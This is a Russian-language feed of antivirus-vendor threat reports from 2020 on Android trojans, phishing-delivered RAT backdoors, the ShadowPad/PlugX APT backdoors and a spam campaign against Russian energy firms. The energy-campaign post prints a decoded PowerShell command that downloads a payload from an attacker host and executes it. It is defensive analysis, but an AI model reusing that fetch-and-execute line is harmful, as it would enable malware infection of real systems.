Программные модули, встраиваемые в Android-приложения и предназначенные для показа навязчивой рекламы на мобильных устройствах. В зависимости от семейства и модификации они могут демонстрировать рекламу в полноэкранном режиме, блокируя окна других приложений, выводить различные уведомления, создавать ярлыки и загружать веб-сайты.
Наряду с Android.Mixi.44.origin в течение последнего осеннего месяца вирусные аналитики компании «Доктор Веб» обнаружили в каталоге Google Play несколько новых модификаций троянов семейства Android.Joker. Они были добавлены в вирусную базу Dr.Web как Android.Joker.418, Android.Joker.419 и Android.Joker.452. Эти трояны распространялись под видом безобидных приложений - программы-переводчика, сборника изображений, а также утилиты с большим набором функций, таких как компас, фонарик, уровень и др.
Вредоносные приложения загружали и выполняли произвольный код, а также могли подписывать пользователей на платные мобильные сервисы, перехватывая из поступающих уведомлений коды подтверждения для подключаемых услуг.
Для защиты Android-устройств от вредоносных и нежелательных программ пользователям следует установить антивирусные продукты Dr.Web для Android.
http://feedproxy.google.com/~r/drweb/viruses/~3/4uvunTMb49M/
|
|
«Доктор Веб»: обзор вирусной активности в ноябре 2020 года |
16 декабря 2020 года
В ноябре анализ данных статистики Dr.Web показал незначительное уменьшение общего числа обнаруженных угроз — на 1.75% по сравнению с октябрем. Количество уникальных угроз при этом увеличилось на 5.26%. Чаще всего пользователей атаковали программы для показа рекламы, а также троянские загрузчики и установщики. В почтовом трафике на первых позициях находится разнообразное вредоносное ПО, в том числе бэкдор, написанный на .NET, банковский троян Trojan.SpyBot.699, а также программы, использующие уязвимости документов Microsoft Office.
Число обращений пользователей за расшифровкой файлов снизилось на 3.08% по сравнению с октябрем. Самым распространенным энкодером остается Trojan.Encoder.26996, на долю которого приходится 36.68% всех инцидентов.
В ноябре вирусные аналитики компании «Доктор Веб» зафиксировали рассылку фишинговых писем корпоративным пользователям. Злоумышленники использовали метод социальной инженерии, чтобы заставить потенциальных жертв открыть вредоносные вложения. Письма содержали троянские программы, обеспечивающие скрытую установку и запуск утилиты Remote Utilities, компоненты которой также находились в составе вложения. В случае заражения компьютеры сотрудников оказывались доступны для удаленного управления без каких-либо визуальных признаков работы программы.
Угрозы прошедшего месяца:
По сравнению с прошлым месяцем, в ноябре запросов на расшифровку файлов от пользователей, пострадавших от шифровальщиков, в антивирусную лабораторию «Доктор Веб» поступило на 3.08% меньше.
В течение ноября 2020 года в базу нерекомендуемых и вредоносных сайтов было добавлено 154 606 интернет-адресов.
| Октябрь 2020 | Ноябрь 2020 | Динамика |
|---|---|---|
| + 157 076 | + 154 606 | - 1.57% |
Согласно статистике детектирований, полученной антивирусными продуктами Dr.Web для Android, в ноябре на защищаемых устройствах было выявлено на 5.14% меньше угроз по сравнению с октябрем.
В каталоге Google Play по-прежнему появляются различные вредоносные приложения. Так, в прошедшем месяце вирусные аналитики «Доктор Веб» обнаружили в нем очередных троянов. Среди них были представители семейства Android.Joker, способные выполнять произвольный код и подписывать пользователей на дорогостоящие мобильные услуги, а также многофункциональный троян Android.Mixi.44.origin.
Наиболее заметные события, связанные с «мобильной» безопасностью в ноябре:
Более подробно о вирусной обстановке для мобильных устройств в ноябре читайте в нашем обзоре.
http://feedproxy.google.com/~r/drweb/viruses/~3/hOpJ5Y_m0i0/
|
|
Фишинговые рассылки RAT-троянов угрожают корпоративным пользователям |
11 декабря 2020 года
Обнаруженные нами образцы можно разделить на 2 группы:
Обе группы вредоносного ПО объединяет не только используемый инструмент — Remote Utilities, — но и формат фишинговых писем. Их можно охарактеризовать как достаточно грамотно составленные и относительно объемные сообщения на русском языке, использующие потенциально интересную для получателя тему. Другой особенностью является защита вредоносной нагрузки при помощи пароля, при этом сам пароль приложен в виде текстового файла. Формат пароля представляет собой дату отправки письма.
Пример письма с вредоносным вложением, использующим DLL Hijacking:
В приложенном архиве находится защищенный RAR-архив и текстовый файл с паролем к нему.
Для обеспечения конфиденциальности вложения установлен автоматический пароль: 02112020
Архив «Электронная повестка.rar» содержит дроппер в виде самораспаковывающегося RAR-архива, в котором, в свою очередь, находится BackDoor.RMS.180.
Ниже приведен пример письма с вложением, использующим MSI-пакет.
Архив «Документы.rar» помимо архива с вредоносной нагрузкой (BackDoor.RMS.181) и файла с паролем содержит документы-пустышки.
В связи с корпоративной политикой безопасности данное вложение защищено кодом доступа: 12112020
В ходе исследования мы также обнаружили образец фишингового письма, содержащего ссылку на дроппер, запускающий установку утилиты Remote Utilities из настроенного MSI-пакета (детектируется Dr.Web как BackDoor.RMS.187). В этом письме отличается формат вредоносного модуля и способ его получения.
Вложение «CV_resume.rar» представляет собой ссылку на взломанный сайт, перенаправляющий пользователя на другой ресурс для загрузки вредоносного архива с BackDoor.RMS.187.
В результате анализа сетевой инфраструктуры, используемой злоумышленниками для распространения BackDoor.RMS.187, мы обнаружили еще несколько скомпрометированных сайтов, а также образец трояна Trojan.Gidra. По нашим данным, программа, детектируемая Dr.Web как Trojan.GidraNET.1, использовалась для первичного проникновения в систему через фишинговое письмо и дальнейшей загрузки бэкдора, скрыто устанавливающего утилиту Remote Utilties.
Подробные технические описания обнаруженных вредоносных программ находятся в вирусной библиотеке Dr.Web.
BackDoor.RMS.180
BackDoor.RMS.181
BackDoor.RMS.187
Trojan.GidraNET.1
Бэкдоры на базе утилит для удаленного администрирования остаются актуальной угрозой безопасности и до сих пор применяются для атак на корпоративный сектор. В свою очередь фишинговые письма являются основным средством доставки полезной нагрузки на заражаемые компьютеры. Отличительная черта вредоносных вложений — архивация полезной нагрузки с использованием пароля, что позволяет письму преодолеть встроенные в почтовый сервер средства защиты. Другой особенностью является наличие текстового файла с паролем к поддельному архиву. Кроме того, использование вредоносной библиотеки и атаки DLL Hijacking обеспечивает скрытое функционирование ПО для удаленного управления на скомпрометированном устройстве.
http://feedproxy.google.com/~r/drweb/viruses/~3/eyiVea88jJw/
|
|
В приложении для заботы о зрении пользователей Android-устройств обнаружен троян |
1 декабря 2020 года
Приложение под названием Eye Care - Your close Eye Care Assistant доступно в каталоге Google Play с 2018 года, но троянская функциональность появилась в нем лишь в 2019 году, начиная с версии 1.2.11. Вредоносные версии программы были добавлены в вирусную базу Dr.Web как Android.Mixi.44.origin.
Внешне это приложение выглядит безобидно и работает в соответствии с ожиданиями пользователя. Однако после запуска оно незаметно приступает к выполнению вредоносных действий.
Android.Mixi.44.origin собирает и передает на C&C-сервер следующую информацию о зараженном устройстве:
Одной из его функций является мошенническая монетизация недавно выполненных установок приложений. Для этого Android.Mixi.44.origin постоянно отслеживает факт установки и удаления программ, сохраняя информацию о каждом таком действии.
Подключаясь к C&C-серверу, троян получает от него ссылку на сайт, с которого передается список веб-адресов для посещения. С интервалом в несколько секунд он незаметно загружает каждый из них в невидимом WebView. Если полученная в результате цепочки перенаправлений ссылка ведет на страницу приложения, размещенного в каталоге Google Play, но еще не установленного на устройство, троян запоминает имя пакета этого приложения и время перехода по ссылке. Далее он просто ожидает момента, когда пользователь выполнит установку нужной программы. Если в дальнейшем Android.Mixi.44.origin обнаруживает установку такого приложения, он передает в сервис рекламной аналитики, отслеживающий успешно выполненные рекламные задания, имя пакета, а также реферал-идентификатор (идентификатор участника партнерской программы). Таким образом троян пытается обмануть этот сервис и присвоить злоумышленникам установку приложения, которую пользователь выполнил самостоятельно и без их участия.
Если же полученная в задании ссылка на страницу в Google Play ведет на приложение, которое уже было установлено ранее, и информация о нем известна трояну, Android.Mixi.44.origin аналогичным образом пытается обмануть сервис аналитики, передав ему имя пакета вместе с реферал-идентификатором злоумышленников.
Другая функция Android.Mixi.44.origin - работа в режиме кликера, когда получаемые трояном ссылки ведут на всевозможные сайты. Посещая их незаметно для пользователя, он увеличивает их популярность, за что партнерские сервисы также платят злоумышленникам.
Кроме того, по команде C&C-сервера троян способен загружать различные веб-страницы и демонстрировать их поверх окон других приложений, а также поверх интерфейса самой операционной системы. Для этого он эксплуатирует уязвимость Toast Overlay, известную на протяжении нескольких лет. Ей подвержены устройства под управлением ОС Android вплоть до версии 7.1. Троян создает всплывающее уведомление типа Toast, которое перекрывает все остальные графические элементы. В это уведомление он помещает WebView с загруженной в него целевой веб-страницей. При этом содержимое такой страницы может быть любым: рекламный баннер, видеоролик или даже фишинговый сайт.
Таким образом, основными функциями Android.Mixi.44.origin являются показ рекламы, накрутка счетчиков популярности веб-сайтов, а также его потенциальное применение в фишинг-атаках. Вместе с тем этот троян принадлежит к семейству многофункциональных вредоносных приложений, предназначенных для выполнения широкого спектра задач. Отдельные представители этого семейства способны получать root-полномочия, незаметно устанавливать и удалять другие программы и выполнять другие опасные действия. При этом некоторые из этих троянов обнаруживались в том числе в системных каталогах Android-устройств. Один из них - Android.Mixi.36.origin. Он использует потенциально опасную утилиту Tool.SilentInstaller.7.origin для скрытого запуска загружаемых приложений. А среди скачиваемых им программ может быть Android.Mixi.42.origin - одна из модификаций рассмотренного трояна Android.Mixi.44.origin. Она обладает всеми ее функциями, но уже способна самостоятельно скачивать и незаметно запускать ПО.
Антивирусные продукты Dr.Web для Android успешно детектируют все известные модификации Android.Mixi.44.origin, а также других троянов этого семейства, поэтому для наших пользователей те опасности не представляют. Для удаления вредоносных Android-приложений из системных директорий необходимо комплексное решение Dr.Web Security Space для Android, а также наличие root-доступа. Проверить, подвержено ли ваше устройство уязвимости Toast Overlay, можно также с помощью Dr.Web Security Space для Android.
Подробнее об Android.Mixi.44.origin
Подробнее об уязвимости Toast Overlay
http://feedproxy.google.com/~r/drweb/viruses/~3/bYqCzU18-7A/
|
|
«Доктор Веб»: обзор вирусной активности в октябре 2020 года |
9 ноября 2020 года
В октябре анализ данных статистики Dr.Web показал значительное увеличение общего числа обнаруженных угроз — на 37.80% по сравнению с сентябрем. Количество уникальных вредоносных программ при этом снизилось на 2.64%. Рекламные программы и загрузчики вредоносного ПО по-прежнему лидируют по общему количеству детектирований. В почтовом трафике на первых позициях продолжает находиться банковский троян Trojan.SpyBot.699, а также вредоносное ПО, использующее уязвимости документов Microsoft Office. Кроме того, пользователям продолжают угрожать различные модификации вредоносных HTML-документов, распространяемых в виде вложений и перенаправляющих на фишинговые сайты.
Число обращений пользователей за расшифровкой файлов продолжает держаться на одном уровне четвертый месяц. Самым распространенным энкодером остается Trojan.Encoder.26996, на долю которого приходится 26.34% всех инцидентов.
Угрозы прошедшего месяца:
По сравнению с прошлым месяцем в октябре в антивирусную лабораторию «Доктор Веб» поступило на 1.67% меньше запросов на расшифровку файлов от пользователей, пострадавших от шифровальщиков.
В течение октября 2020 года в базу нерекомендуемых и вредоносных сайтов было добавлено 157 076 интернет-адресов.
| Сентябрь 2020 | Октябрь 2020 | Динамика |
|---|---|---|
| + 152 270 | + 157 076 | + 3.16% |
Статистика детектирований угроз на Android-устройствах показала, что в минувшем октябре было выявлено на 12.36% больше угроз, чем в сентябре. При этом почти в 3 раза возросло число обнаружений потенциально опасных программ. Этот скачок произошел за счет распространения приложений, защищенных специализированным программным обфускатором, который злоумышленники могут использовать при создании троянов, усложняя их обнаружение антивирусами.
В течение октября наши специалисты выявили в каталоге Google Play множество новых вредоносных программ. Среди них были очередные трояны семейства Android.FakeApp, которые загружали мошеннические веб-сайты, а также рекламный троян, получивший имя Android.HiddenAds.2314.
Наиболее заметные события, связанные с «мобильной» безопасностью в октябре:
Более подробно о вирусной обстановке для мобильных устройств в октябре читайте в нашем обзоре.
http://feedproxy.google.com/~r/drweb/viruses/~3/A9ichvKlHh4/
|
|
«Доктор Веб»: обзор вирусной активности для мобильных устройств в октябре 2020 года |
09 ноября 2020 года
В октябре антивирусные продукты Dr.Web для Android выявили на защищаемых Android-устройствах на 12.36% больше угроз, чем месяцем ранее. Согласно статистике детектирований, число вредоносных программ увеличилось на 9.08%, нежелательных - на 6%, а потенциально опасных - на 197.24%. Количество обнаруженных рекламных приложений при этом снизилось на 1.51%.
Практически троекратный рост числа потенциально опасных программ в статистике обнаружений обусловлен распространением приложений, защищенных специализированной утилитой Tool.Obfuscapk.1. Она применяется для обфускации исходного кода и может использоваться не только добросовестными разработчиками, но и вирусописателями, которые пытаются защитить троянские программы от обнаружения антивирусами.
В каталоге Google Play были зафиксированы очередные угрозы. Специалисты «Доктор Веб» обнаружили множество новых троянов семейства Android.FakeApp, которые распространялись под видом программ-справочников, якобы предназначенных для помощи в получении налоговых вычетов и социальных компенсаций. На самом деле они загружали мошеннические веб-сайты, с помощью которых злоумышленники могли украсть у пользователей конфиденциальную информацию и деньги.
Другая вредоносная программа из Google Play получила имя Android.HiddenAds.2314. Это троян, предназначенный для показа навязчивой рекламы. Он распространялся под видом графического редактора.
Программные модули, встраиваемые в Android-приложения и предназначенные для показа навязчивой рекламы на мобильных устройствах. В зависимости от семейства и модификации они могут демонстрировать рекламу в полноэкранном режиме, блокируя окна других приложений, выводить различные уведомления, создавать ярлыки и загружать веб-сайты.
В октябре специалисты «Доктор Веб» выявили в каталоге Google Play 17 новых модификаций троянов семейства Android.FakeApp, которые распространялись под видом безобидных приложений, таких как справочники. Большинство из них злоумышленники вновь выдавали за программы, якобы предназначенные для проверки наличия социальных компенсаций и помощи в получении возврата налогов. По классификации антивируса Dr.Web они получили имена Android.FakeApp.208, Android.FakeApp.209, Android.FakeApp.210, Android.FakeApp.212, Android.FakeApp.213, Android.FakeApp.214, Android.FakeApp.215 и Android.FakeApp.216.
Еще одна модификация представляла собой поддельную программу спортивной тематики и была добавлена в вирусную базу как Android.FakeApp.211.
Однако настоящая и единственная их функция - загрузка мошеннических веб-сайтов. В общей сложности эти трояны скачали свыше 105 000 владельцев Android-устройств.
При запуске вредоносные приложения загружают сайты, где потенциальной жертве предлагается указать персональные данные якобы для проверки доступных денежных компенсаций. После того как компенсация «найдена», у пользователя запрашивается дополнительная информация, а затем ему предлагается оплатить налог или пошлину за перевод «возвращаемых» денег. Если владелец устройства соглашается на это, злоумышленники узнают не только его конфиденциальные данные (например, имя, фамилия, номер телефона и адрес электронной почты), но и реквизиты банковской карты с секретным CVV2-кодом. При этом жертва мошенничества не получает никаких обещанных компенсаций.
Другой выявленный троян принадлежал семейству вредоносных приложений Android.HiddenAds и был добавлен в вирусную базу Dr.Web как Android.HiddenAds.2314. Он распространялся под видом программы для редактирования изображений. При запуске троян скрывает свой значок из списка ПО в меню главного экрана, чтобы в дальнейшем его было сложнее обнаружить и удалить с устройства. Затем он начинает показывать рекламу, которая демонстрируется поверх окон других приложений и интерфейса операционной системы, мешая нормальному использованию устройства.
Для защиты Android-устройств от вредоносных и нежелательных программ пользователям следует установить антивирусные продукты Dr.Web для Android.
http://feedproxy.google.com/~r/drweb/viruses/~3/7qV9mc9N8sI/
|
|
Исследование APT-бэкдора ShadowPad и его связи с PlugX |
27 октября 2020 года
В июле 2020 года мы выпустили исследование APT-атак на государственные учреждения Казахстана и Киргизии с подробным разбором вредоносных программ, найденных в скомпрометированных сетях. В процессе расследования вирусные аналитики «Доктор Веб» проанализировали и описали несколько групп троянских программ, включая представителей как уже встречавшихся специалистам семейств, так и ранее неизвестные трояны, из которых самым главным открытием оказались образцы семейства XPath. Нам также удалось обнаружить ряд признаков, позволивших связать два изначально независимых инцидента. В обоих случаях злоумышленники использовали похожие наборы вредоносного ПО, в том числе одни и те же узкоспециализированные бэкдоры, которыми были инфицированы контроллеры домена в атакованных организациях.
В ходе экспертизы аналитики изучили образцы мультимодульных бэкдоров PlugX, которые применялись для первичного проникновения в сетевую инфраструктуру. Анализ показал, что некоторые модификации PlugX использовали те же доменные имена управляющих серверов, что и другие изученные нами бэкдоры, связанные с целевыми атаками на учреждения государств Центральной Азии. При этом обнаружение программ семейства PlugX свидетельствует о возможной причастности к рассматриваемым инцидентам китайских APT-групп.
По нашим данным, несанкционированное присутствие в обеих сетях продолжалось более трех лет, а за атаками могли стоять сразу несколько хакерских группировок. Расследования столь комплексных киберинцидентов предполагают продолжительную работу, поэтому их редко удается осветить одной публикацией.
В вирусную лабораторию «Доктор Веб» поступили новые образцы ВПО, обнаруженные на одном из зараженных компьютеров локальной сети госучреждения Киргизии.
В дополнение к описанным в предыдущем материале вредоносным программам особого внимания заслуживает бэкдор ShadowPad. Различные модификации этого семейства являются известным инструментом Winnti — APT-группы предположительно китайского происхождения, активной как минимум с 2012 года. Примечательно, что на компьютере вместе с ShadowPad был также установлен бэкдор Farfli, при этом обе программы обращались к одному управляющему серверу. Кроме того, на этом же компьютере мы обнаружили несколько модификаций PlugX.
В этом исследовании мы разобрали алгоритмы работы обнаруженных бэкдоров. Особое внимание уделено сходствам в коде образцов ShadowPad и PlugX, а также некоторым пересечениям в их сетевой инфраструктуре.
На зараженном компьютере были найдены следующие бэкдоры:
| SHA256-хеши | Детектирование | Управляющий сервер | Дата установки |
|---|---|---|---|
| ac6938e03f2a076152ee4ce23a39a0bfcd676e4f0b031574d442b6e2df532646 | BackDoor.ShadowPad.1 | www[.]pneword[.]net | 07.09.2018 13:14:57.664 |
| 9135cdfd09a08435d344cf4470335e6d5577e250c2f00017aa3ab7a9be3756b3 2c4bab3df593ba1d36894e3d911de51d76972b6504d94be22d659cff1325822e |
BackDoor.Farfli.122 BackDoor.Farfli.125 |
www[.]pneword[.]net | 03.11.2017 09:06:07.646 |
| 3ff98ed63e3612e56be10e0c22b26fc1069f85852ea1c0b306e4c6a8447c546a (DLL-загрузчик) b8a13c2a4e09e04487309ef10e4a8825d08e2cd4112846b3ebda17e013c97339 (основной модуль) |
BackDoor.PlugX.47 BackDoor.PlugX.48 |
www[.]mongolv[.]com | 29.12.2016 14:57:00.526 |
| 32e95d80f96dae768a82305be974202f1ac8fcbcb985e3543f29797396454bd1 (DLL-загрузчик) b8a13c2a4e09e04487309ef10e4a8825d08e2cd4112846b3ebda17e013c97339 (основной модуль) |
BackDoor.PlugX.47 BackDoor.PlugX.48 |
www[.]arestc[.]net | 23.03.2018 13:06:01.444 |
| b8a13c2a4e09e04487309ef10e4a8825d08e2cd4112846b3ebda17e013c97339 (основной модуль) | BackDoor.PlugX.48 | www[.]icefirebest[.]com | 03.12.2018 14:12:24.111 |
Для дальнейшего исследования мы нашли и проанализировали другие образцы семейства ShadowPad, чтобы более детально рассмотреть сходство бэкдоров семейств ShadowPad и PlugX:
Подробное исследование образцов ShadowPad и их сравнение с ранее изученными нами модификациями PlugX указывает на высокую схожесть принципов действия и модульных структур бэкдоров обоих семейств. Эти вредоносные программы сближает не только общая концепция, но и нюансы кода: некоторые приемы разработки, идеи и технические решения практически копируют друг друга. Немаловажным фактом является и то, что оба бэкдора находились в скомпрометированной сети государственного учреждения Киргизии.
Подробные технические описания обнаруженных вредоносных программ находятся в PDF-версии исследования и в вирусной библиотеке Dr.Web.
Имеющиеся данные позволяют нам сделать вывод о связи этих семейств, при этом возможны как простое заимствование кода, так и разработка обеих программ одним автором или группой авторов. Во втором случае весьма вероятной видится эволюция PlugX в более новый и совершенный ShadowPad, так как формат хранения вредоносных модулей, применяемый в последнем, многократно затрудняет возможность их обнаружения в оперативной памяти.
http://feedproxy.google.com/~r/drweb/viruses/~3/b1ohlvT-3n0/
|
|
«Доктор Веб»: обзор вирусной активности в сентябре 2020 года |
22 октября 2020 года
В сентябре анализ данных статистики Dr.Web показал увеличение общего числа обнаруженных угроз — на 13.88% по сравнению с августом. Количество уникальных вредоносных программ также выросло — на 19.17%. Большинство выявленных угроз по-прежнему приходится на долю рекламных программ, а также троянских загрузчиков вредоносного ПО. В почтовом трафике среди самых распространенных угроз вновь оказался опасный банковский троян Trojan.SpyBot.699. Кроме того, пользователям продолжают угрожать различные модификации вредоносных HTML-документов, распространяемых в виде вложений и перенаправляющих пользователей на фишинговые сайты.
В сентябре количество обращений пользователей за расшифровкой файлов осталось на августовском уровне. Самым распространенным энкодером остается Trojan.Encoder.26996, на долю которого приходится 35.71% всех инцидентов.
Угрозы прошедшего месяца:
По сравнению с августом в сентябре в антивирусную лабораторию «Доктор Веб» поступило на 0.45% меньше запросов на расшифровку файлов от пользователей, пострадавших от шифровальщиков.
В течение сентября 2020 года в базу нерекомендуемых и вредоносных сайтов было добавлено 152 270 интернет-адресов.
| Август 2020 | Сентябрь 2020 | Динамика |
|---|---|---|
| + 174 501 | + 152 270 | - 12.74% |
В сентябре на Android-устройствах было выявлено на 3.75% больше угроз, чем в августе. При этом в каталоге Google Play вновь распространялись всевозможные троянские программы. В их числе оказались представители семейства Android.Joker, способные выполнять произвольный код и подписывать жертв на дорогостоящие мобильные услуги. Другой угрозой стал опасный многофункциональный троян Android.Triada.545.origin, который также мог выполнять произвольный код и похищал конфиденциальную информацию. Кроме того, вирусные аналитики компании «Доктор Веб» выявили очередного трояна-кликера, получившего имя Android.Click.978. Он показывал рекламу, а также загружал различные веб-сайты и переходил по находившимся на них ссылкам и баннерам.
Наиболее заметные события, связанные с «мобильной» безопасностью в сентябре:
Более подробно о вирусной обстановке для мобильных устройств в сентябре читайте в нашем обзоре.
http://feedproxy.google.com/~r/drweb/viruses/~3/ZuGPrDAqV0A/
|
|
«Доктор Веб»: обзор вирусной активности для мобильных устройств в сентябре 2020 года |
22 октября 2020 года
Согласно статистике детектирований антивирусных продуктов Dr.Web для Android, в сентябре на защищаемых устройствах было зафиксировано на 3.75% больше угроз, чем в августе. По сравнению с прошлым месяцем количество обнаруженных вредоносных программ увеличилось на 5.58%, а потенциально опасных - на 4.98%. При этом число рекламных и нежелательных приложений сократилось на 6.22% и 8.83% соответственно.
В течение сентября вирусные аналитики «Доктор Веб» выявили в каталоге Google Play несколько новых вредоносных приложений. Среди них оказались представители опасного семейства троянов Android.Joker, способных выполнять произвольный код и подписывать жертв на платные сервисы. Кроме того, злоумышленники распространяли трояна-кликера Android.Click.978, показывавшего рекламу, а также многофункционального трояна Android.Triada.545.origin, который использовался в том числе для фишинга.
Программные модули, встраиваемые в Android-приложения и предназначенные для показа навязчивой рекламы на мобильных устройствах. В зависимости от семейства и модификации они могут демонстрировать рекламу в полноэкранном режиме, блокируя окна других приложений, выводить различные уведомления, создавать ярлыки и загружать веб-сайты.
В сентябре в каталоге Google Play было обнаружено несколько новых модификаций троянов семейства Android.Joker, один из которых распространялся под видом графического редактора и получил имя Android.Joker.341. Как и другие представители семейства, эта вредоносная программа загружала и исполняла произвольный код, а также могла подписывать пользователей на платные услуги, получая коды подтверждений из поступающих уведомлений.
В зависимости от архитектуры процессора, используемой на зараженном устройстве, при старте троян загружает в память одну из скрытых в его apk-файле нативных библиотек (антивирус Dr.Web детектирует их как Android.Joker.339 и Android.Joker.340).
В свою очередь, загруженная библиотека извлекает из себя вредоносный модуль Android.Joker.177.origin, который скачивает с удаленного сервера модуль Android.Joker.192.origin. Тот получает доступ к содержимому уведомлений и загружает с сервера еще один модуль - Android.Joker.107.origin. В нем содержится основная вредоносная функциональность.
Позднее вирусные аналитики «Доктор Веб» обнаружили аналогичного трояна, которого злоумышленники распространяли под видом сборника изображений. Он был добавлен в вирусную базу Dr.Web как Android.Joker.344.
Другой угрозой оказался многофункциональный троян Android.Triada.545.origin, принадлежащий семейству опасных вредоносных программ Android.Triada. Он скрывался в приложении-фотокамере.
Одной из функций Android.Triada.545.origin является фишинг. При запуске троян демонстрирует поддельное окно авторизации в сервисах Google. В нем жертвам предлагается ввести информацию для доступа к их учетной записи - якобы чтобы продолжить использовать приложение. Чтобы еще больше сбить пользователей с толку, в окне также говорится о возможности принять участие в розыгрыше нового телефона после входа в учетную запись. Однако все это - лишь уловка, и вводимые данные передаются злоумышленникам.
Кроме того, Android.Triada.545.origin может загружать и выполнять произвольный код, а также перехватывать уведомления и похищать из них информацию - например, пин-коды.
Еще одной Android-угрозой, обнаруженной в Google Play в сентябре, стал троян-кликер Android.Click.978, распространявшийся под видом приложения с предсказаниями. После запуска он скрывал свой значок из списка приложений в меню главного экрана устройства и начинал показывать рекламу, которая демонстрировалась даже после закрытия Android.Click.978. Троян также загружал веб-сайты и автоматически нажимал на расположенные на них ссылки и баннеры.
Для защиты Android-устройств от вредоносных и нежелательных программ пользователям следует установить антивирусные продукты Dr.Web для Android.
http://feedproxy.google.com/~r/drweb/viruses/~3/c_65lB1_Gss/
|
|
Целевые шпионские спам-кампании угрожают предприятиям ТЭК РФ |
23 сентября 2020 года
В конце апреля 2020 года вирусные аналитики компании «Доктор Веб» зафиксировали спам-кампанию, в ходе которой сотрудникам ряда предприятий топливно-энергетического комплекса России под видом обновленного телефонного справочника рассылались документы с расширением .docx, которые загружали два изображения с удаленных ресурсов.
Одно из них загружалось на пользовательский компьютер с сервера news[.]zannews[.]com. Примечательно, что доменное имя схоже с доменом антикоррупционного медиацентра Казахстана — zannews[.]kz. С другой стороны, используемый домен сразу напомнил о другой известной кампании 2015 года, известной как TOPNEWS, в которой использовался бэкдор ICEFOG, а домены управления троянами имели подстроку «news» в названиях. Другой интересной особенностью стало то, что при отправке писем различным адресатам в запросах на загрузку изображения использовались разные параметры запроса или же уникальные имена изображений. Мы считаем, что это было сделано с целью сбора информации для определения «надежного» адресата, который в последующем гарантированно откроет письмо. Для загрузки изображения со второго сервера использовался протокол SMB, что могло быть сделано для сбора NetNTLM-хешей с компьютеров сотрудников, открывших полученный документ.
В июне этого года злоумышленники начали использовать новое доменное имя — sports[.]manhajnews[.]com. Как показал анализ, субдомены manhajnews[.]com использовались в спам-рассылках как минимум с сентября 2019 года. Так, одной из целей в рамках этой кампании оказался крупный российский университет.
Кроме того, в июне была запущена очередная кампания: на этот раз документ содержал информацию об отраслевом развитии. Текст письма явно указывал на то, что его автор не является носителем русского языка. При этом сервер для загрузки изображений был изменен на download[.]inklingpaper[.]com
В качестве попытки обойти детектирование вредоносных документов антивирусными программами в июле злоумышленники стали использовать документы Microsoft Word, зашифрованные при помощи пароля. Одновременно с этим само содержание письма было незначительно изменено:
Текст обращения вновь был написан в прежнем стиле, чем вызывал дополнительные подозрения у адресата. Сервер для скачивания картинки также не менялся.
Отметим, что во всех случаях для рассылки писем использовались электронные почтовые ящики, зарегистрированные на доменах mail[.]ru и yandex[.]ru.
В начале сентября 2020 года вирусные аналитики зафиксировали новую спам-кампанию, в рамках которой злоумышленники вновь рассылали письма под предлогом обновления телефонного справочника. Однако на этот раз вложение содержало вредоносный макрос.
При открытии приложенного документа макрос создавал два файла: VBS-скрипт
Суть его работы сводится к запуску оболочки Powershell с определенными параметрами. Параметры, передаваемые оболочке, декодируются в следующие команды:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;
Как следует из представленных команд, домен, с которого загружается полезная нагрузка, вновь замаскирован под новостной сайт. На заражаемый компьютер доставляется простой загрузчик, единственной задачей которого является получение шелл-кода от управляющего сервера и его выполнение. Специалистам компании «Доктор Веб» удалось выявить два вида бэкдоров, которые могут быть установлены на ПК жертвы.
Первый из них — BackDoor.Siggen2.3238 — ранее не встречался нашим специалистам, при этом какие-либо упоминания этой программы другими антивирусными вендорами также не нашлись. Второй является модификацией уже известного нам по инциденту с государственным учреждением Казахстана бэкдора BackDoor.Whitebird. Кроме того, в ходе исследования мы обнаружили еще один домен, который использовался в ходе этой кампании, — news[.]microotf[.]com. Однако мы не нашли ни одной троянской программы, которая использовала бы этот домен в качестве управляющего сервера.
Анализ документов, вредоносных программ, а также использованной инфраструктуры позволяет нам с уверенностью сказать, что атака была подготовлена одной из китайских APT-групп. Учитывая функциональность бэкдоров, которые устанавливаются на компьютеры жертв в случае успешной атаки, заражение ведет как минимум к краже конфиденциальной информации с компьютеров атакованных организаций. Кроме того, весьма вероятным сценарием является установка специализированных троянов на локальные серверы с особой функцией, такие как контроллеры домена, почтовые серверы, интернет-шлюзы и т. п. Как мы могли наблюдать на примере инцидента в Казахстане, такие серверы по различным причинам представляют особый интерес для злоумышленников.
Специалисты вирусной лаборатории «Доктор Веб» обращают внимание пользователей на необходимость внимательно относиться ко всей входящей корреспонденции, включая письма, полученные от якобы известных адресантов.
Вложение, содержащее вредоносный макрос, было успешно обнаружено облачным анализатором Dr.Web vxCube.
Подробные технические описания обнаруженных вредоносных программ находятся в вирусной библиотеке Dr.Web.
http://feedproxy.google.com/~r/drweb/viruses/~3/RQG63ydQmKo/
|
|
«Доктор Веб»: обзор вирусной активности для мобильных устройств в августе 2020 года |
16 сентября 2020 года
В августе на Android-устройствах было выявлено на 2,21% больше угроз, чем в июле. Количество вредоносных программ при этом увеличилось на 6,26%, в то время как число нежелательных приложений сократилось на 0,49%, потенциально опасных — на 13,82%, а рекламных — на 10,1%.
Специалисты компании «Доктор Веб» обнаружили в каталоге Google Play очередные угрозы. В их числе – различные модификации троянских приложений семейства Android.FakeApp, которые распространялись под видом программ-справочников и загружали мошеннические сайты. Кроме того, был найден новый представитель семейства многофункциональных троянов Android.Joker, подписывающий пользователей на платные услуги и способный загружать и исполнять произвольный код.
Программные модули, встраиваемые в Android-приложения и предназначенные для показа навязчивой рекламы на мобильных устройствах. В зависимости от семейства и модификации они могут демонстрировать рекламу в полноэкранном режиме, блокируя окна других приложений, выводить различные уведомления, создавать ярлыки и загружать веб-сайты.
В августе вирусные аналитики компании «Доктор Веб» обнаружили в каталоге Google Play сразу несколько новых вредоносных программ семейства Android.FakeApp, получивших имена Android.FakeApp.199, Android.FakeApp.200, Android.FakeApp.202 и Android.FakeApp.203. Они распространялись под видом справочников с информацией о получении социальных выплат и возврате НДС.
При запуске эти трояны загружают мошеннический сайт несуществующей организации «Единый Компенсационный Центр Возврата Налога Добавленной Стоимости», где потенциальным жертвам предлагается указать персональные данные якобы для проверки доступности той или иной денежной компенсации. После ввода информации на сайте имитируется процесс поиска, и пользователи видят ложное сообщение об успешно найденных для них вариантах возврата денег.
